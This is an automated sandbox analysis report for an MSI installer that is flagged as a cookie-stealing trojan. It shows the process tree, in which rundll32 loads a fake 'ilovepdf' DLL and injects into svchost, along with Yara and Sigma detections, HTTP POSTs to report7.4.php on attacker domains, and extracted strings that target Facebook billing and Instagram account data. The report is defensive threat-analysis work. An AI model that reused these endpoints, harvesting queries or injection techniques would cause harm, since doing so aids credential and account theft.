Windows Analysis Report 6rfyiAq0nM

Overview

General Information

Sample Name: 6rfyiAq0nM (renamed file extension from none to msi)
Analysis ID: 508222
MD5: 623673851fbb205eb0d1003cb892d4d6
SHA1: c541b4e10541bb0a6565ba8cc6b64d2480ef4437
SHA256: 71a98e982a9dde0ffcf9a46554b7abaf947ac4c33f3a3b35df1a58b0064d0704
Tags: msi

Detection

Cookie Stealer
Score: 74
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Cookie Stealer
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Allocates memory in foreign processes
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to compare user and computer (likely to detect sandboxes)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to infect the boot sector
Contains functionality to steal Chrome passwords or cookies
Modifies the context of a thread in another process (thread injection)
Contains functionality to inject threads in other processes
Sets debug register (to hijack the execution of another thread)
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to enumerate running services
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Contains functionality to clear windows event logs (to hide its activities)
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6980 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 7056 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • MSIFBC3.tmp (PID: 4928 cmdline: C:\Windows\Installer\MSIFBC3.tmp MD5: B6D7559D31D4FF2D02338DF9CEF2FBD8)
      • MSIFBC3.tmp (PID: 6292 cmdline: 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp' MD5: D73DDB8F6B777CC6411FD3CA254F3DEC)
        • rundll32.exe (PID: 5336 cmdline: 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • svchost.exe (PID: 2968 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: 32569E403279B3FD2EDB7EBD036273FA)
            • svchost.exe (PID: 6944 cmdline: C:\Windows\system32\svchost.exe -k SystemNetworkService MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 6212 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 996 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 256 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2320 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2188 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1512 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1124 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2468 cmdline: c:\windows\system32\svchost.exe -k netsvcs MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 664 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2948 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1452 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1868 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1340 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 3444 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1188 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 5104 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0xed44a:$s1: \xAE\xB2\xB2\xB6\xFC\xE9\xE9

Memory Dumps

Source | Rule | Description | Author | Strings
00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x6646e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
5 of 65 matching entries shown.

Unpacked PEs

Source | Rule | Description | Author | Strings
27.2.svchost.exe.2743a320000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
34.2.svchost.exe.202b28f0000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
20.2.svchost.exe.1d91aad0000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
24.2.svchost.exe.1dc51fb0000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
37.2.svchost.exe.1afba170000.0.unpack | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
5 of 69 matching entries shown.

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started. Author: Florian Roth. Data:
  Command: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  CommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  CommandLine|base64offset|contains:
  Image: C:\Windows\System32\svchost.exe
  NewProcessName: C:\Windows\System32\svchost.exe
  OriginalFileName: C:\Windows\System32\svchost.exe
  ParentCommandLine: 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
  ParentImage: C:\Windows\SysWOW64\rundll32.exe
  ParentProcessId: 5336
  ProcessCommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  ProcessId: 2968

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 6rfyiAq0nM.msi, Virustotal: Detection: 31%
Source: 6rfyiAq0nM.msi, ReversingLabs: Detection: 35%
Multi AV Scanner detection for domain / URL
Source: https://fg.mygameagend.com/report7.4.php, Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp, ReversingLabs: Detection: 25%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 1948 DNS zone transfer UDP 192.168.2.3:60785 -> 34.64.183.91:53
Source: Traffic, Snort IDS: 1948 DNS zone transfer UDP 192.168.2.3:53947 -> 34.64.183.91:53
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\svchost.exe, Domain query: toa.mygametoa.com
Source: global traffic, HTTP traffic detected:
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
  Host: bh.mygameadmin.com
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
  Host: fg.mygameagend.com
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
  Host: bh.mygameadmin.com
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
  Host: bh.mygameadmin.com
  Content-Length: 558
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
  Host: bh.mygameadmin.com
  Content-Length: 254
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 208.95.112.1
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drString found in binary or memory: https://jrsoftware.org0
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000002.812144840.00000202B1A5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
Source: svchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/7E5B
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.netB7E5B
Source: svchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.netll
Source: svchost.exe, 00000022.00000000.394067819.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.netm
Source: svchost.exe, 00000010.00000003.421876578.0000012E1764D000.00000004.00000001.sdmpString found in binary or memory: https://p-api.com/json/?fields=8198
Source: svchost.exeString found in binary or memory: https://pcbmhome.com/click.php?cnv_id=%s&cl=%d
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drString found in binary or memory: https://sectigo.com/CPS0D
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divxvideo/x-matroskavideo/divx
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashapplication/futuresplashapplication/x-shockwave-fla
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_javaapplication/x-java-appletapplication/x-java-applet;j
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdfapplication/pdfapplication/vnd.adobe.x-marsapplicatio
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktimeapplication/sdpapplication/x-mpegapplication/x-
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_realaudio/vnd.rn-realaudiovideo/vnd.rn-realvideoaudio/x-
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwaveapplication/x-director
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmpWindows
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drString found in binary or memory: https://www.certum.pl/CPS0
Source: MSIFBC3.tmp, MSIFBC3.tmp, 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, MSIFBC3.tmp.10.drString found in binary or memory: https://www.innosetup.com/
Source: svchost.exeString found in binary or memory: https://www.instagram.com/accounts/edit/
Source: MSIFBC3.tmp, MSIFBC3.tmp.10.drString found in binary or memory: https://www.remobjects.com/ps
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
Source: svchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com-969C-B95DBF145D3D.local
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com2
Source: unknownDNS traffic detected: queries for: toa.mygametoa.com
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ECDFF0 recv,SetLastError,GetLastError,WSAGetLastError,
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: Facebook Video Callinghttps://www.facebook.com/chat/video/videocalldownload.phpWe do not track version information for the Facebook Video Calling Plugin.requires_authorizationcomment equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing""token":"async_get_token":""ACCOUNT_ID":""USER_ID":"{"adAccountID":"{access_token:"{"sessionID":"account_currency_ratio_to_usd:https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag=@@https://www.facebook.com/profile.php"displayable_count":"section_type":"FRIENDS"__a=1&fb_dtsg=https://www.facebook.com/personal_settings/page_items/for (;;);payloaditemsfb_dtsg=&variables=%7B%22pagination%22%3A%7B%22after%22%3A%220%22%2C%22num_items%22%3A3%7D%2C%22query_params%22%3A%7B%22payment_type%22%3A%22FBPAY_HUB%22%7D%7D&server_timestamps=true&doc_id=3475732812534491https://secure.facebook.com/api/graphql/datapayment_method_infoavailable_payment_optionscc_typeCREDIT_CARD__a=1&av=&__user=&fb_dtsg=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubAssetOwnerViewQuery&variables={"assetOwnerId":"","startTime":1612137600}&doc_id=3739963982749339https://www.facebook.com/api/graphql/viewerDatadefault_businessnodeshttps://www.facebook.com/adsmanager/manage/accounts?act="adtrust_dsl":av=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingAMNexusRootQuery&variables={"paymentAccountID":""}&doc_id=4075226092554060billable_account_by_payment_accountaccount_statusDISABLEDACTIVEbalanceformattedbillable_account_tax_infobusiness_country_codecurrencystored_balance_statusprepay_account_balancebilling_threshold_currency_amountformatted_amountbilling_payment_accountbilling_payment_methodscredential__typenameExternalCreditCardPaymentPaypalBillingAgreementStoredBalanceExtendedCredit&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubLandingPageQuery&doc_id=3953057938071449viewerad_accountsadvertising_restriction_infois_restrictedrestriction_daterestriction_typeaccount_user&variables=%7B%22paymentAccountID%22%3A%22%22%2C%22count%22%3A10%2C%22cursor%22%3Anull%2C%22filters%22%3A%5B%5D%2C%22start_time%22%3A1281628800%2C%22end_time%22%3A1630425600%7D&&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingTransactionTableQuery&doc_id=5015578711817965billing_txnsedgesflow=logged_in_settings&reload=1&__a=1&__user=https://www.facebook.com/login/device-based/turn-on/00000000000000000000000000000000SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}2https://pcbmhome.com/click.php?cnv_id=%s&cl=%dfacebook.comkernel32.dllRtlGetNtVersionNumbersntdll.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%sInstallLocation\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%sGoogle ChromeMicrosoft EdgeYandexBrowserSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\UninstallLauncher.exehttps://www.instagram.com/accounts/edit/"viewerId":""username":""email":""phone_number":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36HTTP/1.0Cookie: equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/adsmanager/manage/accounts?act= equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag= equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/login/device-based/turn-on/ equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/personal_settings/page_items/ equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/profile.php equals www.facebook.com (Facebook)
Source: svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmpString found in binary or memory: https://www.facebook.comPragma: no-cache equals www.facebook.com (Facebook)
Source: unknownHTTP traffic detected: POST /report7.4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Host: bh.mygameadmin.comContent-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBB820 GetAsyncKeyState,Sleep,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB74A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB7500 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB6590 CreateEventW,OpenDesktopW,CreateDesktopW,SetThreadDesktop,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplaySettingsW,GetDC,CreateCompatibleDC,GetVersionExA,

System Summary:

Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004323DC
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004255DC
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0040E9C4
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_006B6128
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0040C938
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EED4C1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB1C60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EF0C01
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBC540
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EE77D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EDC770
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EDAF40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EDA860
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED11A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED69B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBC990
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ECA160
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED73ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBBBF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EE5B60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04D93CAB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04D7A0D5
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EC6B0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EF5E0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0E0E00
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0E4E00
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FBE25
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0E6E10
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D9640
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0E4660
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D10BEE0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FC575
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D10DDC4
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D10C5B0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0E6010
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D10680C
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D10A068
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F4070
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D1008E0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D1148CC
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D119EFD
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0DF730
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0ECF50
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D2FA0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0E8FB0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0DE200
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D11026C
